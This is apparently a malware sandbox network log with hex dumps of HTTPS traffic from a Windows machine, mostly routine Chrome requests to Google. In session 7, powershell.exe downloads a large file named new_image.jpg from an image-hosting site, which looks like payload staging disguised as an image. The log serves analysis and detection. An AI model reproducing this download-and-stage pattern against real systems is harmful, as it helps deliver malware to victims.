2024-05-04 07:50:21 UTC	1255	IN	Data Raw: 7d 29 7d 63 61 74 63 68 28 64 29 7b 5f 2e 71 2e 63 6f 6e 73 6f 6c 65 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 71 2e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 64 2e 6d 65 73 73 61 67 65 29 7d 72 65 74 75 72 6e 20 62 7d 3b 5c 6e 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 30 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6f 6d 65 2e 63 61 6c 6c 28 61 2c 62 2c 76 6f 69 64 20 30 29 7d 3b 74 72 79 7b 28 6e 65 77 20 73 65 6c 66 2e 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 30 2c 30 29 29 2e 67 65 74 43 6f 6e 74 65 78 Data Ascii: })}catch(d){_.q.console\u0026\u0026_.q.console.error(d.message)}return b};\n_.Jd\u003dfunction(a,b){return 0\u003d\u003da.lastIndexOf(b,0)};_.Kd\u003dfunction(a,b){return Array.prototype.some.call(a,b,void 0)};try{(new self.OffscreenCanvas(0,0)).getContex

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.3	49718	142.250.68.68	443	6008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:21 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-04 07:50:21 UTC	922	IN	HTTP/1.1 200 OK Version: 629707551 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 04 May 2024 07:50:21 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-04 07:50:21 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-05-04 07:50:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.3	49727	142.250.68.46	443	6008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:28 UTC	757	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIm2yQEIorbJAQipncoBCL/qygEIlKHLAQiLq8wBCIWgzQEIuMjNAQi5ys0BCIrTzQEIttjNARj1yc0BGMfYzQEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-04 07:50:29 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 121628 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Tue, 30 Apr 2024 06:53:06 GMT Expires: Wed, 30 Apr 2025 06:53:06 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 15 Apr 2024 17:34:54 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 349043 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-04 07:50:29 UTC	339	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 32 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 62 61 2c 63 61 2c 64 61 2c 6e 61 2c 70 61 2c 76 61 2c 77 61 2c 7a 61 3b 62 61 3d 66 75 6e 63 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x20000, ]);var ba,ca,da,na,pa,va,wa,za;ba=func
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 7d 7d 3b 63 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c Data Ascii: }};ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};da=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 64 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 64 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 26 26 63 61 28 64 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 75 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 22 75 6e 64 Data Ascii: on"===typeof d&&"function"!=typeof d.prototype[a]&&ca(d.prototype,a,{configurable:!0,writable:!0,value:function(){return pa(ba(this))}})}return a});pa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.ua=function(a){var b="und
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 2e 50 66 29 7b 74 68 69 73 2e 50 66 3d 5b 5d 3b 76 61 72 20 6b 3d 74 68 69 73 3b 74 68 69 73 2e 74 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 2e 45 37 28 29 7d 29 7d 74 68 69 73 2e 50 66 2e 70 75 73 68 28 68 29 7d 3b 76 61 72 20 64 3d 5f 2e 6d 61 2e 73 65 74 54 69 6d 65 6f 75 74 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 74 50 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 64 28 68 2c 30 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 45 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e 50 66 26 26 74 68 69 73 2e 50 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 50 66 3b 74 68 69 73 2e 50 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d Data Ascii: .Pf){this.Pf=[];var k=this;this.tP(function(){k.E7()})}this.Pf.push(h)};var d=_.ma.setTimeout;b.prototype.tP=function(h){d(h,0)};b.prototype.E7=function(){for(;this.Pf&&this.Pf.length;){var h=this.Pf;this.Pf=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 74 6f 74 79 70 65 2e 6e 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 68 69 73 3b 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 68 2e 67 63 61 28 29 29 7b 76 61 72 20 6b 3d 5f 2e 6d 61 2e 63 6f 6e 73 6f 6c 65 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 6b 26 26 6b 2e 65 72 72 6f 72 28 68 2e 46 66 29 7d 7d 2c 0a 31 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 63 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 73 56 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 68 3d 5f 2e 6d 61 2e 43 75 73 74 6f 6d 45 76 65 6e 74 2c 6b 3d 5f 2e 6d 61 2e 45 76 65 6e 74 2c 6c 3d 5f 2e 6d 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 6c 29 72 65 74 Data Ascii: totype.nea=function(){var h=this;d(function(){if(h.gca()){var k=_.ma.console;"undefined"!==typeof k&&k.error(h.Ff)}},1)};e.prototype.gca=function(){if(this.sV)return!1;var h=_.ma.CustomEvent,k=_.ma.Event,l=_.ma.dispatchEvent;if("undefined"===typeof l)ret
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 3b 74 68 69 73 2e 73 56 3d 21 30 7d 3b 65 2e 72 65 73 6f 6c 76 65 3d 63 3b 65 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 6c 28 68 29 7d 29 7d 3b 65 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 66 6f 72 28 76 61 72 20 6d 3d 5f 2e 75 61 28 68 29 2c 6e 3d 6d 2e 6e 65 78 74 28 29 3b 21 6e 2e 64 6f 6e 65 3b 6e 3d 6d 2e 6e 65 78 74 28 29 29 63 28 6e 2e 76 61 6c 75 65 29 2e 42 79 28 6b 2c 6c 29 7d 29 7d 3b 65 2e 61 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 5f 2e 75 61 28 68 29 2c 6c 3d 6b 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 6c 2e 64 6f 6e 65 3f 63 Data Ascii: ;this.sV=!0};e.resolve=c;e.reject=function(h){return new e(function(k,l){l(h)})};e.race=function(h){return new e(function(k,l){for(var m=_.ua(h),n=m.next();!n.done;n=m.next())c(n.value).By(k,l)})};e.all=function(h){var k=_.ua(h),l=k.next();return l.done?c
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6c 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6d 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6e 3d 6e 65 77 20 61 28 5b 5b 6c 2c 32 5d 2c 5b 6d 2c 33 5d 5d 29 3b 69 66 28 32 21 3d 6e 2e 67 65 74 28 6c 29 7c 7c 33 21 3d 6e 2e 67 65 74 28 6d 29 29 72 65 74 75 72 6e 21 31 3b 6e 2e 64 65 6c 65 74 65 28 6c 29 3b 6e 2e 73 65 74 28 6d 2c 34 29 3b 72 65 74 75 72 6e 21 6e 2e 68 61 73 28 6c 29 26 26 34 3d 3d 6e 2e 67 65 74 28 6d 29 7d 63 61 74 63 68 28 70 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 0a 76 61 72 20 66 3d 22 24 6a 73 63 6f 6d 70 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b Data Ascii: ct.seal)return!1;try{var l=Object.seal({}),m=Object.seal({}),n=new a([[l,2],[m,3]]);if(2!=n.get(l)\|\|3!=n.get(m))return!1;n.delete(l);n.set(m,4);return!n.has(l)&&4==n.get(m)}catch(p){return!1}}())return a;var f="$jscomp_hidden_"+Math.random();e("freeze");
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 20 62 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 0a 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 3b 69 66 28 6b 29 7b 6b 3d 5f 2e 75 61 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 6b 3d 30 3d 3d 3d 6b 3f 30 3a 6b 3b 76 61 72 20 6d 3d 64 28 74 68 69 73 2c 6b 29 3b 6d 2e 6c 69 73 74 7c 7c 28 6d 2e 6c 69 73 74 3d 74 68 69 73 5b 30 5d 5b 6d 2e 69 64 5d 3d 5b 5d 29 3b 6d 2e 6e 66 3f 6d 2e 6e 66 2e 76 61 6c 75 65 3d 6c 3a 28 6d Data Ascii: b=new WeakMap,c=function(k){this[0]={};this[1]=f();this.size=0;if(k){k=_.ua(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}};c.prototype.set=function(k,l){k=0===k?0:k;var m=d(this,k);m.list\|\|(m.list=this[0][m.id]=[]);m.nf?m.nf.value=l:(m
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 6d 3d 62 2e 67 65 74 28 6c 29 3a 28 6d 3d 22 22 2b 20 2b 2b 68 2c 62 2e 73 65 74 28 6c 2c 6d 29 29 3a 6d 3d 22 70 5f 22 2b 6c 3b 76 61 72 20 6e 3d 6b 5b 30 5d 5b 6d 5d 3b 69 66 28 6e 26 26 76 61 28 6b 5b 30 5d 2c 6d 29 29 66 6f 72 28 6b 3d 30 3b 6b 3c 6e 2e 6c 65 6e 67 74 68 3b 6b 2b 2b 29 7b 76 61 72 20 70 3d 6e 5b 6b 5d 3b 69 66 28 6c 21 3d 3d 6c 26 26 70 2e 6b 65 79 21 3d 3d 70 2e 6b 65 79 7c 7c 6c 3d 3d 3d 70 2e 6b 65 79 29 72 65 74 75 72 6e 7b 69 64 3a 6d 2c 6c 69 73 74 3a 6e 2c 69 6e 64 65 78 3a 6b 2c 6e 66 3a 70 7d 7d 72 65 74 75 72 6e 7b 69 64 3a 6d 2c 6c 69 73 74 3a 6e 2c 69 6e 64 65 78 3a 2d 31 2c 6e 66 3a 76 6f 69 64 20 30 7d 7d 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 76 61 72 20 6d 3d 6b 5b 31 5d 3b 72 65 74 75 72 6e 20 70 61 28 66 Data Ascii: m=b.get(l):(m=""+ ++h,b.set(l,m)):m="p_"+l;var n=k[0][m];if(n&&va(k[0],m))for(k=0;k<n.length;k++){var p=n[k];if(l!==l&&p.key!==p.key\|\|l===p.key)return{id:m,list:n,index:k,nf:p}}return{id:m,list:n,index:-1,nf:void 0}},e=function(k,l){var m=k[1];return pa(f
2024-05-04 07:50:29 UTC	1255	IN	Data Raw: 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 34 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 68 69 73 2e 44 61 3d 6e 65 77 20 4d 61 70 3b 69 66 28 63 29 7b 63 3d Data Ascii: urn!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)return!1;f=e.next();return f.done\|\|f.value[0]==c\|\|4!=f.value[0].x\|\|f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var b=function(c){this.Da=new Map;if(c){c=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.3	49732	104.21.45.138	443	8024	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:37 UTC	124	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-05-04 07:50:38 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:50:38 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 120 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7Ahg%2FFi2vxLH8yDo8N8p6vWK2MSXpVBuJ3B8n5VoLk5E0%2Bwd2iLe1svAJ5NzFPwBQsWpGb5rQFKqigCEmj3hpq2KQUDFEok5ebHEXcdSmxfJvkLHxbjxHthy46H6fqgvtG0MX29aILK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e6e6a79969091d-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 07:50:38 UTC	677	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 Data Ascii: TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4ApC.
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 Data Ascii: Ay2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 Data Ascii: r7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(h
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 